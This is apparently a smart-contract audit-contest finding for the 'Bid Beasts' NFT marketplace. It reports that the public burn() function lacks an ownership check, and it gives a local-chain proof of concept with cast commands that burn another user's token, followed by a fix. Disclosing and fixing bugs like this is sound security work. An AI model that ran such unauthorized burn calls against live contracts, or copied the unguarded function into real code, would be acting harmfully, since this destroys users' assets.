Bid Beasts

First Flight #49

Beginner FriendlyFoundrySolidityNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Unauthorized BidBeastNft::burn() Function Allows Arbitrary NFT Destruction, Creating Irrecoverable Asset Loss for Users and Unpayable Protocol NFT Debt

iamkashifyousuf

Description

Normal Behavior
When the protocol mints NFTs, each minted token should remain valid, transferrable, and burnable only by its rightful owner (or approved operator).

Issues
1. User-Owned NFT

Any external account can call burn() and destroy another user’s NFT, even if the caller does not own or control it.
This leads to irrecoverable user asset loss, undermining trust in the protocol.

2. NFT in Marketplace/Auction

If NFTs are held by the marketplace contract during auctions or sales, an attacker can burn them prematurely. This creates a broken auction flow, invalid listings, and potentially leaves buyers with unresolvable purchases. This also introduces protocol-level NFT debt, where the marketplace promises assets that no longer exist.

Relevant Github Link: https://github.com/CodeHawks-Contests/2025-09-bid-beasts/blob/449341c55a57d3f078d1250051a7b34625d3aa04/src/BidBeasts_NFT_ERC721.sol#L23C5-L26C6

@> function burn(uint256 _tokenId) public {

_burn(_tokenId);

emit BidBeastsBurn(msg.sender, _tokenId);

}

Risk

Likelihood:

The risk is highly likely because the burn() function lacks any ownership or approval check, allowing any external account to invoke it. Attackers can repeatedly exploit this at zero cost, making it trivial to execute.

Impact:

The impact is severe, as unauthorized burns cause permanent loss of user-owned NFTs and disrupt marketplace operations. This results in irrecoverable asset destruction and undermines protocol trust and integrity.

Proof of Concept

Deployment of BidBeastsNFT and BidbeastNftMarket in Local Anvil Chain

anvil &
forge script script/BidBeastsNFTMarketPlace.s.sol --rpc-url http://127.0.0.1:8545 --private-key $<deployer-key> --broadcast
Minting NFT as an authorized Minter.

cast send <BidBeastNftAddress> "mint(address)" <UserAddress> --rpc-url http://127.0.0.1:8545 --private-key $<deployer-key>
Burning NFT as an unauthorized user/ attacker

cast send <BidBeastNftAddress> "burn(uint256)" <tokenId> --rpc-url http://127.0.0.1:8545 --private-key <attacker-Key>
Verfiy that Valid NFT owner/ protocal can permantly lost the NFT

cast call <BidBeastNftAddress> "balanceOf(address)(uint256)" <NFTOwnerAddress> --rpc-url http://127.0.0.1:8545

Recommended Mitigation

Add an ownership and authorization check before burning so only the rightful NFT owner or an approved operator can destroy the token. This prevents arbitrary and unauthorized burning of user assets.

function burn(uint256 _tokenId) public {

+ address owner = ownerOf(_tokenId); // also reverts if nonexistent

+ _checkAuthorized(owner, msg.sender, _tokenId);

_burn(_tokenId);

emit BidBeastsBurn(msg.sender, _tokenId);

}

Updates

Lead Judging Commences

cryptoghost Lead Judge 3 months ago

Submission Judgement Published

Validated

Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.

Rewards breakdown

nSLOC

170

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!